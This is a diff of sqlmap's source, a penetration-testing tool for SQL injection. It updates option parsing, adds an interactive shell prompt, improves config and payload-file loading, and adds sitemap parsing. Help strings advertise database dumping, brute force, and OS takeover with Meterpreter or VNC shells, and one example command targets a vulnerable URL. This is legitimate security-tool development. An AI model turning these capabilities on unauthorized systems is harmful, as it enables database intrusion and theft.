|
||||||
|
@ -228,6 +273,10 @@ def cmdLineParser():
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Use logical operations for invalidating values")
|
help="Use logical operations for invalidating values")
|
||||||
|
|
||||||
|
injection.add_option("--invalid-string", dest="invalidString",
|
||||||
|
action="store_true",
|
||||||
|
help="Use random strings for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--no-cast", dest="noCast",
|
injection.add_option("--no-cast", dest="noCast",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Turn off payload casting mechanism")
|
help="Turn off payload casting mechanism")
|
||||||
|
@ -254,7 +303,7 @@ def cmdLineParser():
|
||||||
"default %d)" % defaults.level)
|
"default %d)" % defaults.level)
|
||||||
|
|
||||||
detection.add_option("--risk", dest="risk", type="int",
|
detection.add_option("--risk", dest="risk", type="int",
|
||||||
help="Risk of tests to perform (0-3, "
|
help="Risk of tests to perform (1-3, "
|
||||||
"default %d)" % defaults.level)
|
"default %d)" % defaults.level)
|
||||||
|
|
||||||
detection.add_option("--string", dest="string",
|
detection.add_option("--string", dest="string",
|
||||||
|
@ -386,14 +435,20 @@ def cmdLineParser():
|
||||||
enumeration.add_option("--search", dest="search", action="store_true",
|
enumeration.add_option("--search", dest="search", action="store_true",
|
||||||
help="Search column(s), table(s) and/or database name(s)")
|
help="Search column(s), table(s) and/or database name(s)")
|
||||||
|
|
||||||
|
enumeration.add_option("--comments", dest="getComments", action="store_true",
|
||||||
|
help="Retrieve DBMS comments")
|
||||||
|
|
||||||
enumeration.add_option("-D", dest="db",
|
enumeration.add_option("-D", dest="db",
|
||||||
help="DBMS database to enumerate")
|
help="DBMS database to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-T", dest="tbl",
|
enumeration.add_option("-T", dest="tbl",
|
||||||
help="DBMS database table to enumerate")
|
help="DBMS database table(s) to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-C", dest="col",
|
enumeration.add_option("-C", dest="col",
|
||||||
help="DBMS database table column to enumerate")
|
help="DBMS database table column(s) to enumerate")
|
||||||
|
|
||||||
|
enumeration.add_option("-X", dest="excludeCol",
|
||||||
|
help="DBMS database table column(s) to not enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-U", dest="user",
|
enumeration.add_option("-U", dest="user",
|
||||||
help="DBMS user to enumerate")
|
help="DBMS user to enumerate")
|
||||||
|
@ -403,6 +458,9 @@ def cmdLineParser():
|
||||||
help="Exclude DBMS system databases when "
|
help="Exclude DBMS system databases when "
|
||||||
"enumerating tables")
|
"enumerating tables")
|
||||||
|
|
||||||
|
enumeration.add_option("--where", dest="dumpWhere",
|
||||||
|
help="Use WHERE condition while table dumping")
|
||||||
|
|
||||||
enumeration.add_option("--start", dest="limitStart", type="int",
|
enumeration.add_option("--start", dest="limitStart", type="int",
|
||||||
help="First query output entry to retrieve")
|
help="First query output entry to retrieve")
|
||||||
|
|
||||||
|
@ -425,7 +483,7 @@ def cmdLineParser():
|
||||||
enumeration.add_option("--sql-file", dest="sqlFile",
|
enumeration.add_option("--sql-file", dest="sqlFile",
|
||||||
help="Execute SQL statements from given file(s)")
|
help="Execute SQL statements from given file(s)")
|
||||||
|
|
||||||
# User-defined function options
|
# Brute force options
|
||||||
brute = OptionGroup(parser, "Brute force", "These "
|
brute = OptionGroup(parser, "Brute force", "These "
|
||||||
"options can be used to run brute force "
|
"options can be used to run brute force "
|
||||||
"checks")
|
"checks")
|
||||||
|
@ -481,12 +539,12 @@ def cmdLineParser():
|
||||||
takeover.add_option("--os-pwn", dest="osPwn",
|
takeover.add_option("--os-pwn", dest="osPwn",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Prompt for an OOB shell, "
|
help="Prompt for an OOB shell, "
|
||||||
"meterpreter or VNC")
|
"Meterpreter or VNC")
|
||||||
|
|
||||||
takeover.add_option("--os-smbrelay", dest="osSmb",
|
takeover.add_option("--os-smbrelay", dest="osSmb",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="One click prompt for an OOB shell, "
|
help="One click prompt for an OOB shell, "
|
||||||
"meterpreter or VNC")
|
"Meterpreter or VNC")
|
||||||
|
|
||||||
takeover.add_option("--os-bof", dest="osBof",
|
takeover.add_option("--os-bof", dest="osBof",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
|
@ -557,7 +615,10 @@ def cmdLineParser():
|
||||||
help="Force character encoding used for data retrieval")
|
help="Force character encoding used for data retrieval")
|
||||||
|
|
||||||
general.add_option("--crawl", dest="crawlDepth", type="int",
|
general.add_option("--crawl", dest="crawlDepth", type="int",
|
||||||
help="Crawl the website starting from the target URL")
|
help="Crawl the website starting from the target URL")
|
||||||
|
|
||||||
|
general.add_option("--crawl-exclude", dest="crawlExclude",
|
||||||
|
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
|
||||||
|
|
||||||
general.add_option("--csv-del", dest="csvDel",
|
general.add_option("--csv-del", dest="csvDel",
|
||||||
help="Delimiting character used in CSV output "
|
help="Delimiting character used in CSV output "
|
||||||
|
@ -587,7 +648,7 @@ def cmdLineParser():
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Use DBMS hex function(s) for data retrieval")
|
help="Use DBMS hex function(s) for data retrieval")
|
||||||
|
|
||||||
general.add_option("--output-dir", dest="oDir",
|
general.add_option("--output-dir", dest="outputDir",
|
||||||
action="store",
|
action="store",
|
||||||
help="Custom output directory path")
|
help="Custom output directory path")
|
||||||
|
|
||||||
|
@ -619,7 +680,7 @@ def cmdLineParser():
|
||||||
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
|
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--alert", dest="alert",
|
miscellaneous.add_option("--alert", dest="alert",
|
||||||
help="Run shell command(s) when SQL injection is found")
|
help="Run host OS command(s) when SQL injection is found")
|
||||||
|
|
||||||
miscellaneous.add_option("--answers", dest="answers",
|
miscellaneous.add_option("--answers", dest="answers",
|
||||||
help="Set question answers (e.g. \"quit=N,follow=N\")")
|
help="Set question answers (e.g. \"quit=N,follow=N\")")
|
||||||
|
@ -627,10 +688,6 @@ def cmdLineParser():
|
||||||
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
||||||
help="Make a beep sound when SQL injection is found")
|
help="Make a beep sound when SQL injection is found")
|
||||||
|
|
||||||
miscellaneous.add_option("--check-waf", dest="checkWaf",
|
|
||||||
action="store_true",
|
|
||||||
help="Heuristically check for WAF/IPS/IDS protection")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--cleanup", dest="cleanup",
|
miscellaneous.add_option("--cleanup", dest="cleanup",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Clean up the DBMS from sqlmap specific "
|
help="Clean up the DBMS from sqlmap specific "
|
||||||
|
@ -649,7 +706,7 @@ def cmdLineParser():
|
||||||
|
|
||||||
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
|
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Make a through testing for a WAF/IPS/IDS protection")
|
help="Make a thorough testing for a WAF/IPS/IDS protection")
|
||||||
|
|
||||||
miscellaneous.add_option("--mobile", dest="mobile",
|
miscellaneous.add_option("--mobile", dest="mobile",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
|
@ -665,7 +722,10 @@ def cmdLineParser():
|
||||||
|
|
||||||
miscellaneous.add_option("--smart", dest="smart",
|
miscellaneous.add_option("--smart", dest="smart",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Conduct through tests only if positive heuristic(s)")
|
help="Conduct thorough tests only if positive heuristic(s)")
|
||||||
|
|
||||||
|
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
|
||||||
|
help="Prompt for an interactive sqlmap shell")
|
||||||
|
|
||||||
miscellaneous.add_option("--wizard", dest="wizard",
|
miscellaneous.add_option("--wizard", dest="wizard",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
|
@ -736,22 +796,77 @@ def cmdLineParser():
|
||||||
option = parser.get_option("-h")
|
option = parser.get_option("-h")
|
||||||
option.help = option.help.capitalize().replace("this help", "basic help")
|
option.help = option.help.capitalize().replace("this help", "basic help")
|
||||||
|
|
||||||
args = []
|
argv = []
|
||||||
|
prompt = False
|
||||||
advancedHelp = True
|
advancedHelp = True
|
||||||
|
|
||||||
for arg in sys.argv:
|
for arg in sys.argv:
|
||||||
args.append(getUnicode(arg, system=True))
|
argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
|
||||||
|
|
||||||
checkDeprecatedOptions(args)
|
checkDeprecatedOptions(argv)
|
||||||
|
|
||||||
|
prompt = "--sqlmap-shell" in argv
|
||||||
|
|
||||||
|
if prompt:
|
||||||
|
parser.usage = ""
|
||||||
|
cmdLineOptions.sqlmapShell = True
|
||||||
|
|
||||||
|
_ = ["x", "q", "exit", "quit", "clear"]
|
||||||
|
|
||||||
|
for option in parser.option_list:
|
||||||
|
_.extend(option._long_opts)
|
||||||
|
_.extend(option._short_opts)
|
||||||
|
|
||||||
|
for group in parser.option_groups:
|
||||||
|
for option in group.option_list:
|
||||||
|
_.extend(option._long_opts)
|
||||||
|
_.extend(option._short_opts)
|
||||||
|
|
||||||
|
autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)
|
||||||
|
|
||||||
|
while True:
|
||||||
|
command = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
command = raw_input("sqlmap-shell> ").strip()
|
||||||
|
command = getUnicode(command, encoding=sys.stdin.encoding)
|
||||||
|
except (KeyboardInterrupt, EOFError):
|
||||||
|
print
|
||||||
|
raise SqlmapShellQuitException
|
||||||
|
|
||||||
|
if not command:
|
||||||
|
continue
|
||||||
|
elif command.lower() == "clear":
|
||||||
|
clearHistory()
|
||||||
|
print "[i] history cleared"
|
||||||
|
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||||
|
elif command.lower() in ("x", "q", "exit", "quit"):
|
||||||
|
raise SqlmapShellQuitException
|
||||||
|
elif command[0] != '-':
|
||||||
|
print "[!] invalid option(s) provided"
|
||||||
|
print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
|
||||||
|
else:
|
||||||
|
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||||
|
loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||||
|
break
|
||||||
|
|
||||||
|
try:
|
||||||
|
for arg in shlex.split(command):
|
||||||
|
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||||
|
except ValueError, ex:
|
||||||
|
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex
|
||||||
|
|
||||||
# Hide non-basic options in basic help case
|
# Hide non-basic options in basic help case
|
||||||
for i in xrange(len(sys.argv)):
|
for i in xrange(len(argv)):
|
||||||
if sys.argv[i] == '-hh':
|
if argv[i] == "-hh":
|
||||||
sys.argv[i] = '-h'
|
argv[i] = "-h"
|
||||||
elif sys.argv[i] == '--version':
|
elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
|
||||||
print VERSION_STRING
|
argv[i] = argv[i][:-1]
|
||||||
|
conf.skipThreadCheck = True
|
||||||
|
elif argv[i] == "--version":
|
||||||
|
print VERSION_STRING.split('/')[-1]
|
||||||
raise SystemExit
|
raise SystemExit
|
||||||
elif sys.argv[i] == '-h':
|
elif argv[i] == "-h":
|
||||||
advancedHelp = False
|
advancedHelp = False
|
||||||
for group in parser.option_groups[:]:
|
for group in parser.option_groups[:]:
|
||||||
found = False
|
found = False
|
||||||
|
@ -764,24 +879,27 @@ def cmdLineParser():
|
||||||
parser.option_groups.remove(group)
|
parser.option_groups.remove(group)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
(args, _) = parser.parse_args(args)
|
(args, _) = parser.parse_args(argv)
|
||||||
|
except UnicodeEncodeError, ex:
|
||||||
|
print "\n[!] %s" % ex.object.encode("unicode-escape")
|
||||||
|
raise SystemExit
|
||||||
except SystemExit:
|
except SystemExit:
|
||||||
if '-h' in sys.argv and not advancedHelp:
|
if "-h" in argv and not advancedHelp:
|
||||||
print "\n[!] to see full list of options run with '-hh'"
|
print "\n[!] to see full list of options run with '-hh'"
|
||||||
raise
|
raise
|
||||||
|
|
||||||
# Expand given mnemonic options (e.g. -z "ign,flu,bat")
|
# Expand given mnemonic options (e.g. -z "ign,flu,bat")
|
||||||
for i in xrange(len(sys.argv) - 1):
|
for i in xrange(len(argv) - 1):
|
||||||
if sys.argv[i] == '-z':
|
if argv[i] == "-z":
|
||||||
expandMnemonics(sys.argv[i + 1], parser, args)
|
expandMnemonics(argv[i + 1], parser, args)
|
||||||
|
|
||||||
if args.dummy:
|
if args.dummy:
|
||||||
args.url = args.url or DUMMY_URL
|
args.url = args.url or DUMMY_URL
|
||||||
|
|
||||||
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
|
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
|
||||||
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
|
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
|
||||||
args.purgeOutput, args.pickledOptions)):
|
args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
|
||||||
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --update, --purge-output or --dependencies), "
|
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
|
||||||
errMsg += "use -h for basic or -hh for advanced help"
|
errMsg += "use -h for basic or -hh for advanced help"
|
||||||
parser.error(errMsg)
|
parser.error(errMsg)
|
||||||
|
|
||||||
|
|
|
@ -1,15 +1,18 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
|
|
||||||
from ConfigParser import MissingSectionHeaderError
|
from ConfigParser import MissingSectionHeaderError
|
||||||
|
from ConfigParser import ParsingError
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
from lib.core.common import checkFile
|
||||||
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.common import openFile
|
||||||
from lib.core.common import unArrayizeValue
|
from lib.core.common import unArrayizeValue
|
||||||
from lib.core.common import UnicodeRawConfigParser
|
from lib.core.common import UnicodeRawConfigParser
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
|
@ -30,12 +33,17 @@ def configFileProxy(section, option, boolean=False, integer=False):
|
||||||
global config
|
global config
|
||||||
|
|
||||||
if config.has_option(section, option):
|
if config.has_option(section, option):
|
||||||
if boolean:
|
try:
|
||||||
value = config.getboolean(section, option) if config.get(section, option) else False
|
if boolean:
|
||||||
elif integer:
|
value = config.getboolean(section, option) if config.get(section, option) else False
|
||||||
value = config.getint(section, option) if config.get(section, option) else 0
|
elif integer:
|
||||||
else:
|
value = config.getint(section, option) if config.get(section, option) else 0
|
||||||
value = config.get(section, option)
|
else:
|
||||||
|
value = config.get(section, option)
|
||||||
|
except ValueError, ex:
|
||||||
|
errMsg = "error occurred while processing the option "
|
||||||
|
errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if value:
|
if value:
|
||||||
conf[option] = value
|
conf[option] = value
|
||||||
|
@ -59,29 +67,31 @@ def configFileParser(configFile):
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
checkFile(configFile)
|
checkFile(configFile)
|
||||||
configFP = codecs.open(configFile, "rb", UNICODE_ENCODING)
|
configFP = openFile(configFile, "rb")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
config = UnicodeRawConfigParser()
|
config = UnicodeRawConfigParser()
|
||||||
config.readfp(configFP)
|
config.readfp(configFP)
|
||||||
except MissingSectionHeaderError:
|
except Exception, ex:
|
||||||
errMsg = "you have provided an invalid configuration file"
|
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getUnicode(ex)
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if not config.has_section("Target"):
|
if not config.has_section("Target"):
|
||||||
errMsg = "missing a mandatory section 'Target' in the configuration file"
|
errMsg = "missing a mandatory section 'Target' in the configuration file"
|
||||||
raise SqlmapMissingMandatoryOptionException(errMsg)
|
raise SqlmapMissingMandatoryOptionException(errMsg)
|
||||||
|
|
||||||
condition = not config.has_option("Target", "url")
|
condition = not config.has_option("Target", "direct")
|
||||||
|
condition &= not config.has_option("Target", "url")
|
||||||
condition &= not config.has_option("Target", "logFile")
|
condition &= not config.has_option("Target", "logFile")
|
||||||
condition &= not config.has_option("Target", "bulkFile")
|
condition &= not config.has_option("Target", "bulkFile")
|
||||||
condition &= not config.has_option("Target", "googleDork")
|
condition &= not config.has_option("Target", "googleDork")
|
||||||
condition &= not config.has_option("Target", "requestFile")
|
condition &= not config.has_option("Target", "requestFile")
|
||||||
|
condition &= not config.has_option("Target", "sitemapUrl")
|
||||||
condition &= not config.has_option("Target", "wizard")
|
condition &= not config.has_option("Target", "wizard")
|
||||||
|
|
||||||
if condition:
|
if condition:
|
||||||
errMsg = "missing a mandatory option in the configuration file "
|
errMsg = "missing a mandatory option in the configuration file "
|
||||||
errMsg += "(url, logFile, bulkFile, googleDork, requestFile or wizard)"
|
errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)"
|
||||||
raise SqlmapMissingMandatoryOptionException(errMsg)
|
raise SqlmapMissingMandatoryOptionException(errMsg)
|
||||||
|
|
||||||
for family, optionData in optDict.items():
|
for family, optionData in optDict.items():
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -70,7 +70,7 @@ class FingerprintHandler(ContentHandler):
|
||||||
self._feedInfo("technology", attrs.get("technology"))
|
self._feedInfo("technology", attrs.get("technology"))
|
||||||
|
|
||||||
if self._sp.isdigit():
|
if self._sp.isdigit():
|
||||||
self._feedInfo("sp", "Service Pack %s" % self._match.group(int(self._sp)))
|
self._feedInfo("sp", "Service Pack %s" % int(self._sp))
|
||||||
|
|
||||||
self._regexp = None
|
self._regexp = None
|
||||||
self._match = None
|
self._match = None
|
||||||
|
|
|
@ -1,14 +1,13 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import itertools
|
import itertools
|
||||||
import os
|
import os
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
|
@ -36,7 +35,6 @@ def headersParser(headers):
|
||||||
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
|
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
|
||||||
value = headers[header]
|
value = headers[header]
|
||||||
xmlfile = kb.headerPaths[header]
|
xmlfile = kb.headerPaths[header]
|
||||||
checkFile(xmlfile)
|
|
||||||
|
|
||||||
handler = FingerprintHandler(value, kb.headersFp)
|
handler = FingerprintHandler(value, kb.headersFp)
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,7 +9,6 @@ import re
|
||||||
|
|
||||||
from xml.sax.handler import ContentHandler
|
from xml.sax.handler import ContentHandler
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
|
@ -49,7 +48,6 @@ def htmlParser(page):
|
||||||
"""
|
"""
|
||||||
|
|
||||||
xmlfile = paths.ERRORS_XML
|
xmlfile = paths.ERRORS_XML
|
||||||
checkFile(xmlfile)
|
|
||||||
handler = HTMLHandler(page)
|
handler = HTMLHandler(page)
|
||||||
|
|
||||||
parseXmlFile(xmlfile, handler)
|
parseXmlFile(xmlfile, handler)
|
||||||
|
|
|
@ -1,15 +1,19 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
|
||||||
from xml.etree import ElementTree as et
|
from xml.etree import ElementTree as et
|
||||||
|
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.datatype import AttribDict
|
from lib.core.datatype import AttribDict
|
||||||
|
from lib.core.exception import SqlmapInstallationException
|
||||||
|
|
||||||
def cleanupVals(text, tag):
|
def cleanupVals(text, tag):
|
||||||
if tag in ("clause", "where"):
|
if tag in ("clause", "where"):
|
||||||
|
@ -66,7 +70,34 @@ def parseXmlNode(node):
|
||||||
|
|
||||||
conf.tests.append(test)
|
conf.tests.append(test)
|
||||||
|
|
||||||
def loadPayloads():
|
def loadBoundaries():
|
||||||
doc = et.parse(paths.PAYLOADS_XML)
|
try:
|
||||||
|
doc = et.parse(paths.BOUNDARIES_XML)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
|
|
||||||
root = doc.getroot()
|
root = doc.getroot()
|
||||||
parseXmlNode(root)
|
parseXmlNode(root)
|
||||||
|
|
||||||
|
def loadPayloads():
|
||||||
|
payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
|
||||||
|
payloadFiles.sort()
|
||||||
|
|
||||||
|
for payloadFile in payloadFiles:
|
||||||
|
payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
|
||||||
|
|
||||||
|
#logger.debug("Parsing payloads from file '%s'" % payloadFile)
|
||||||
|
|
||||||
|
try:
|
||||||
|
doc = et.parse(payloadFilePath)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
|
|
||||||
|
root = doc.getroot()
|
||||||
|
parseXmlNode(root)
|
||||||
|
|
57
lib/parse/sitemap.py
Normal file
57
lib/parse/sitemap.py
Normal file
|
@ -0,0 +1,57 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import httplib
|
||||||
|
import re
|
||||||
|
|
||||||
|
from lib.core.common import readInput
|
||||||
|
from lib.core.data import kb
|
||||||
|
from lib.core.data import logger
|
||||||
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.request.connect import Connect as Request
|
||||||
|
from thirdparty.oset.pyoset import oset
|
||||||
|
|
||||||
|
abortedFlag = None
|
||||||
|
|
||||||
|
def parseSitemap(url, retVal=None):
|
||||||
|
global abortedFlag
|
||||||
|
|
||||||
|
if retVal is not None:
|
||||||
|
logger.debug("parsing sitemap '%s'" % url)
|
||||||
|
|
||||||
|
try:
|
||||||
|
if retVal is None:
|
||||||
|
abortedFlag = False
|
||||||
|
retVal = oset()
|
||||||
|
|
||||||
|
try:
|
||||||
|
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||||
|
except httplib.InvalidURL:
|
||||||
|
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||||
|
raise SqlmapSyntaxException, errMsg
|
||||||
|
|
||||||
|
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||||
|
if abortedFlag:
|
||||||
|
break
|
||||||
|
url = match.group(1).strip()
|
||||||
|
if url.endswith(".xml") and "sitemap" in url.lower():
|
||||||
|
if kb.followSitemapRecursion is None:
|
||||||
|
message = "sitemap recursion detected. Do you want to follow? [y/N] "
|
||||||
|
test = readInput(message, default="N")
|
||||||
|
kb.followSitemapRecursion = test[0] in ("y", "Y")
|
||||||
|
if kb.followSitemapRecursion:
|
||||||
|
parseSitemap(url, retVal)
|
||||||
|
else:
|
||||||
|
retVal.add(url)
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
abortedFlag = True
|
||||||
|
warnMsg = "user aborted during sitemap parsing. sqlmap "
|
||||||
|
warnMsg += "will use partial list"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
return retVal
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
110
lib/request/basic.py
Normal file → Executable file
110
lib/request/basic.py
Normal file → Executable file
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -15,6 +15,7 @@ import zlib
|
||||||
|
|
||||||
from lib.core.common import extractErrorMessage
|
from lib.core.common import extractErrorMessage
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
|
from lib.core.common import getPublicTypeMembers
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import resetCookieJar
|
from lib.core.common import resetCookieJar
|
||||||
|
@ -26,10 +27,10 @@ from lib.core.data import logger
|
||||||
from lib.core.enums import HTTP_HEADER
|
from lib.core.enums import HTTP_HEADER
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
from lib.core.exception import SqlmapCompressionException
|
from lib.core.exception import SqlmapCompressionException
|
||||||
|
from lib.core.settings import BLOCKED_IP_REGEX
|
||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import EVENTVALIDATION_REGEX
|
from lib.core.settings import EVENTVALIDATION_REGEX
|
||||||
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
||||||
from lib.core.settings import ML
|
|
||||||
from lib.core.settings import META_CHARSET_REGEX
|
from lib.core.settings import META_CHARSET_REGEX
|
||||||
from lib.core.settings import PARSE_HEADERS_LIMIT
|
from lib.core.settings import PARSE_HEADERS_LIMIT
|
||||||
from lib.core.settings import VIEWSTATE_REGEX
|
from lib.core.settings import VIEWSTATE_REGEX
|
||||||
|
@ -37,6 +38,7 @@ from lib.parse.headers import headersParser
|
||||||
from lib.parse.html import htmlParser
|
from lib.parse.html import htmlParser
|
||||||
from lib.utils.htmlentities import htmlEntities
|
from lib.utils.htmlentities import htmlEntities
|
||||||
from thirdparty.chardet import detect
|
from thirdparty.chardet import detect
